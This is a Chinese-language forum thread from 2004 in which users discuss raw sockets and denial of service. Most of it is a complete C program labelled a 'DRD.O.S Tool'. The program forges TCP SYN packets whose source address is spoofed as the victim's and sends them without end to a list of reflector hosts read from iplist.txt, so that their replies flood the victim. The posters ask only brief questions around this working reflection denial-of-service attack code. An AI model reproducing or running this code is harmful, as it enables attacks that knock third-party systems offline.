关于DOS与原始套接口的问题

你确定你真的需要DOS下的RAW SOCKET ？

实战分享：从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线！ | 新一代分布式关系型数据库RadonDB知多少？

GG_MM

白手起家

论坛徽章:: 0

3楼 [报告]

发表于 2004-06-23 13:59 |只看该作者

关于DOS与原始套接口的问题

我所说的DOS不是操作系统MS-DOS，是叫做D.O.S的一种手段\r\n近来有朋友要帮忙看一段程序，大致内容如下：\r\n1 构建原始套接口\r\n2 构建IP , TCP 头部 <IP源地址与目标地址，端口自定义>;\r\n3 发送包\r\n\r\n我不知道他为什么这么做，有什么作用，只是隐约记得有资料上写过这种手段\r\n叫D.O.S , 现在问题是我能不能在他发的包后加上我还需要发送的数据，目标IP\r\n能不能收到<假设目标IP的端口上有一个LISTEN，能不能建立起TCP握手？>;\r\n我看了<UNIX网络编程卷一>;，但是没有找到答案

实战分享：从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线！ | 新一代分布式关系型数据库RadonDB知多少？

灰色轨迹

丰衣足食

论坛徽章:: 0

4楼 [报告]

发表于 2004-06-23 15:03 |只看该作者

关于DOS与原始套接口的问题

源码可不可以给我一份？wuzb@technodia.com.cn\r\n\r\n也许是一个SYN Flood，或者别的源码呢

实战分享：从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线！ | 新一代分布式关系型数据库RadonDB知多少？

GG_MM

白手起家

论坛徽章:: 0

5楼 [报告]

发表于 2004-06-24 15:54 |只看该作者

关于DOS与原始套接口的问题

代码贴出来,读的一个叫\"IPLIST.TXT\"的文件确定对方IP,此文件无需贴出\r\nVC写的,发送的IP ,TCP头部与经典的DOS似乎一样,为什么要叫做DRDOS呢?\r\n\r\n\r\n

///////////////////////////////////////////////////////\r\n/// DRD.O.S Tool\r\n/// http://www.safechina.net \r\n/// Written by CDrea \r\n/// 2003-01-31 \r\n/// \r\n/// If u add some function, Please give me a copy \r\n/// mailto: rose_raiden@hotmail.com \r\n///////////////////////////////////////////////////////\r\n\r\n#include <stdio.h>;\r\n#include <string.h>;\r\n#include <Winsock2.h>;\r\n#include <Ws2tcpip.h>;\r\n#pragma comment(lib,\"ws2_32\")\r\n#define HOST_LEN 15\r\n#define SEQ 0x28376839\r\n#define TCP_SERVER_PORT 80\r\n#define FAKE_PORT 80\r\n#define STATUS_FAILED 0xFFFF\r\n\r\n\r\n\r\ntypedef struct _iphdr\r\n{\r\n unsigned char h_lenver;\r\n unsigned char tos;\r\n unsigned short total_len;\r\n unsigned short ident;\r\n unsigned short frag_and_flags;\r\n unsigned char ttl;\r\n unsigned char proto;\r\n unsigned short checksum;\r\n unsigned int sourceIP;\r\n unsigned int destIP;\r\n}IP_HEADER, * PIP_HEADER;\r\n\r\ntypedef struct _tcphdr\r\n{\r\n unsigned short th_sport;\r\n unsigned short th_dport;\r\n unsigned int th_seq;\r\n unsigned int th_ack;\r\n unsigned char th_lenres;\r\n unsigned char th_flag;\r\n unsigned short th_win;\r\n unsigned short th_sum;\r\n unsigned short th_urp;\r\n}TCP_HEADER, * PTCP_HEADER;\r\n\r\nstruct\r\n{\r\n unsigned long saddr;\r\n unsigned long daddr;\r\n char mbz;\r\n char ptcl;\r\n unsigned short tcpl;\r\n}psd_header;\r\n\r\nint SendThread(int argc, char * argv[], char * destIp);\r\nvoid Usage(char *);\r\nvoid GetCMD(int argc, char * argv[]);\r\nUSHORT checksum(USHORT * buffer, int size);\r\n\r\nint main(int argc, char * argv[])\r\n{\r\n WSADATA wsaData;\r\n int ErrorCode;\r\n \r\n if(argc < 2 || argc >; 6)\r\n {\r\n Usage(argv[0]);\r\n ExitProcess(STATUS_FAILED);\r\n }\r\n if((ErrorCode=WSAStartup(MAKEWORD(2, 1), &wsaData))!=0)\r\n {\r\n fprintf(stderr, \"WSAStartup failed: %d\\n\", ErrorCode);\r\n ExitProcess(STATUS_FAILED);\r\n }\r\n\r\n ErrorCode = SendThread(argc, argv, argv[1]);\r\n if(ErrorCode != 0)\r\n {\r\n fprintf(stderr, \"Thread failed: %d\\n\", ErrorCode);\r\n ExitProcess(STATUS_FAILED);\r\n }\r\n return 0;\r\n}\r\n\r\nint SendThread(int argc, char * argv[], char * destIP)\r\n{\r\n int TimeOut=2000, ErrorCode, flag, i=0; \r\n char SendBuff[128];\r\n char HostName[HOST_LEN];\r\n char ch;\r\n FILE * fp;\r\n SOCKET SendSock;\r\n struct sockaddr_in DestAddr;\r\n IP_HEADER IpHeader;\r\n TCP_HEADER TcpHeader;\r\n\r\n if((fp=fopen(\"iplist.txt\", \"r\")) == NULL)\r\n {\r\n printf(\"Error: File not found!\\n\");\r\n return -1;\r\n }\r\n SendSock = WSASocket(AF_INET, SOCK_RAW, IPPROTO_RAW, NULL, 0, WSA_FLAG_OVERLAPPED);\r\n if(SendSock == INVALID_SOCKET)\r\n {\r\n fprintf(stderr, \"socket failed: %d\\n\", GetLastError());\r\n ExitProcess(STATUS_FAILED);\r\n }\r\n\r\n flag = true;\r\n ErrorCode = setsockopt(SendSock, IPPROTO_IP, IP_HDRINCL, (char *)&flag, sizeof(int));\r\n if(ErrorCode == SOCKET_ERROR)\r\n {\r\n fprintf(stderr, \"set IP_HDRINCL failed: %d\\n\", GetLastError());\r\n ExitProcess(STATUS_FAILED);\r\n }\r\n\r\n __try\r\n {\r\n if(argc >; 4)\r\n TimeOut = atoi(argv[3]);\r\n ErrorCode = setsockopt(SendSock, SOL_SOCKET, SO_SNDTIMEO, (char *)&TimeOut,\r\n sizeof(TimeOut));\r\n if(ErrorCode == SOCKET_ERROR)\r\n {\r\n fprintf(stderr, \"set TimeOut failed: %d\\n\", GetLastError());\r\n __leave;\r\n }\r\n \r\n DestAddr.sin_family = AF_INET;\r\n// DestAddr.sin_addr.s_addr = inet_addr(SERVER);\r\n if(argc >; 3)\r\n DestAddr.sin_port = htons(atoi(argv[3]));\r\n else\r\n DestAddr.sin_port = htons(TCP_SERVER_PORT);\r\n\r\n IpHeader.h_lenver = (4<<4 | sizeof(IpHeader)/sizeof(unsigned long));\r\n IpHeader.tos = 0;\r\n IpHeader.total_len = htons(sizeof(IP_HEADER) + sizeof(TCP_HEADER));\r\n IpHeader.ident = 1;\r\n IpHeader.frag_and_flags = 0;\r\n IpHeader.ttl = 128;\r\n IpHeader.proto = IPPROTO_TCP;\r\n IpHeader.checksum = 0;\r\n IpHeader.sourceIP = inet_addr(destIP);\r\n IpHeader.destIP = inet_addr(\"0.0.0.0\");\r\n\r\n if(argc >; 2)\r\n TcpHeader.th_sport = htons(atoi(argv[2]));\r\n else\r\n TcpHeader.th_sport = htons(FAKE_PORT);\r\n if(argc >; 3)\r\n TcpHeader.th_dport = htons(atoi(argv[3]));\r\n else\r\n TcpHeader.th_dport = htons(TCP_SERVER_PORT);\r\n TcpHeader.th_seq = htonl(SEQ);\r\n TcpHeader.th_ack = 0;\r\n TcpHeader.th_lenres = (sizeof(TCP_HEADER)/4<<4|0);\r\n TcpHeader.th_flag = 2;\r\n TcpHeader.th_win = htons(16384);\r\n TcpHeader.th_urp = 0;\r\n TcpHeader.th_sum = 0;\r\n\r\n psd_header.saddr = IpHeader.sourceIP;\r\n psd_header.daddr = IpHeader.destIP;\r\n psd_header.mbz = 0;\r\n psd_header.ptcl = IPPROTO_TCP;\r\n psd_header.tcpl = htons(sizeof(TCP_HEADER));\r\n\r\n/* memcpy(SendBuff, &psd_header, sizeof(psd_header));\r\n memcpy(SendBuff+sizeof(psd_header), &TcpHeader, sizeof(TCP_HEADER));\r\n TcpHeader.th_sum = checksum((USHORT *)SendBuff, sizeof(psd_header)+sizeof(TcpHeader));\r\n \r\n memcpy(SendBuff, &IpHeader, sizeof(IP_HEADER));\r\n memcpy(SendBuff+sizeof(IP_HEADER), &TcpHeader, sizeof(TCP_HEADER));\r\n memset(SendBuff+sizeof(IP_HEADER)+sizeof(TCP_HEADER), 0, 4);\r\n IpHeader.checksum = checksum((USHORT *)SendBuff, sizeof(IP_HEADER)+sizeof(TCP_HEADER));\r\n\r\n memcpy(SendBuff, &IpHeader, sizeof(IP_HEADER));\r\n memcpy(SendBuff+sizeof(TCP_HEADER), &TcpHeader, sizeof(TCP_HEADER)); */\r\n \r\n printf(\"Send Packets\\n\");\r\n int Packets = 0;\r\n\r\n ch = fgetc(fp);\r\n GetCMD(argc, argv);\r\n while(1)\r\n {\r\n if(ch == \'\\n\' || ch == EOF)\r\n {\r\n HostName[i] = \'\\0\';\r\n// Add your code here-----------------------\r\n DestAddr.sin_addr.s_addr = inet_addr(HostName);\r\n IpHeader.destIP = inet_addr(HostName);\r\n IpHeader.checksum = 0;\r\n psd_header.daddr = IpHeader.destIP;\r\n TcpHeader.th_seq = htonl(SEQ);\r\n TcpHeader.th_sum = 0;\r\n\r\n memcpy(SendBuff, &psd_header, sizeof(psd_header));\r\n memcpy(SendBuff+sizeof(psd_header), &TcpHeader, sizeof(TCP_HEADER));\r\n TcpHeader.th_sum = checksum((USHORT *)SendBuff, sizeof(psd_header)+sizeof(TcpHeader));\r\n \r\n memcpy(SendBuff, &IpHeader, sizeof(IP_HEADER));\r\n memcpy(SendBuff+sizeof(IP_HEADER), &TcpHeader, sizeof(TCP_HEADER));\r\n memset(SendBuff+sizeof(IP_HEADER)+sizeof(TCP_HEADER), 0, 4);\r\n IpHeader.checksum = checksum((USHORT *)SendBuff, sizeof(IP_HEADER)+sizeof(TCP_HEADER));\r\n\r\n memcpy(SendBuff, &IpHeader, sizeof(IP_HEADER));\r\n memcpy(SendBuff+sizeof(TCP_HEADER), &TcpHeader, sizeof(TCP_HEADER));\r\n\r\n Packets++;\r\n if(Packets == 10240)\r\n {\r\n printf(\".\");\r\n Packets = 1;\r\n }\r\n ErrorCode = sendto(SendSock, SendBuff, sizeof(IP_HEADER)+sizeof(TCP_HEADER), 0,\r\n (struct sockaddr *)&DestAddr, sizeof(DestAddr));\r\n// printf(\"->;%s\\n\", HostName);\r\n//----------------------------\r\n i = 0;\r\n ch = fgetc(fp);\r\n\r\n if(ch == EOF)\r\n {\r\n// i = 0;\r\n rewind(fp);\r\n// memset(HostName, 0, sizeof(HostName));\r\n }\r\n }\r\n HostName[i] = ch;\r\n i++;\r\n ch = fgetc(fp);\r\n }\r\n }\r\n __finally\r\n {\r\n if(SendSock == INVALID_SOCKET)\r\n closesocket(SendSock);\r\n WSACleanup();\r\n }\r\n\r\n return 0;\r\n}\r\n\r\nUSHORT checksum(USHORT *buffer, int size)\r\n{ \r\n unsigned long cksum=0;\r\n while(size >;1)\r\n {\r\n cksum+=*buffer++;\r\n size -=sizeof(USHORT);\r\n }\r\n if(size)\r\n {\r\n cksum += *(UCHAR*)buffer;\r\n }\r\n cksum = (cksum >;>; 16) + (cksum & 0xffff);\r\n cksum += (cksum >;>;16);\r\n\r\n return (USHORT)(~cksum);\r\n}\r\n\r\nvoid Usage(char * msg)\r\n{\r\n printf(\"+-----------------------------+\\n\");\r\n printf(\"| DRD.O.S Tool v0.3 |\\n\");\r\n printf(\"| |\\n\");\r\n printf(\"| http://www.safechina.net |\\n\");\r\n printf(\"+-----------------------------+\\n\");\r\n printf(\"USAGE:\\n\");\r\n printf(\" %s DestIP [DestPort] [TcpServerPort] [TimeOut]\\n\", msg);\r\n printf(\"EXAMPLE:\\n\");\r\n printf(\" %s 192.168.0.1\\n\", msg);\r\n printf(\" %s 192.168.0.1 80\\n\", msg);\r\n printf(\" %s 192.168.0.1 80 170 \\n\", msg);\r\n printf(\" %s 192.168.0.1 80 170 2000\\n\", msg);\r\n}\r\n\r\nvoid GetCMD(int argc, char * argv[])\r\n{\r\n printf(\"<------------------------>;\\n\");\r\n printf(\" Target: %s\\n\", argv[2]);\r\n if(argc >; 3)\r\n printf(\" Target Port: %d\\n\", atoi(argv[3]));\r\n if(argc >; 4)\r\n printf(\" TCP Server Port: %d\\n\", atoi(argv[4]));\r\n if(argc >; 5)\r\n printf(\" Timeout: %d\\n\", atoi(argv[5]));\r\n printf(\"<------------------------>;\\n\");\r\n}\r\n \r\n

复制代码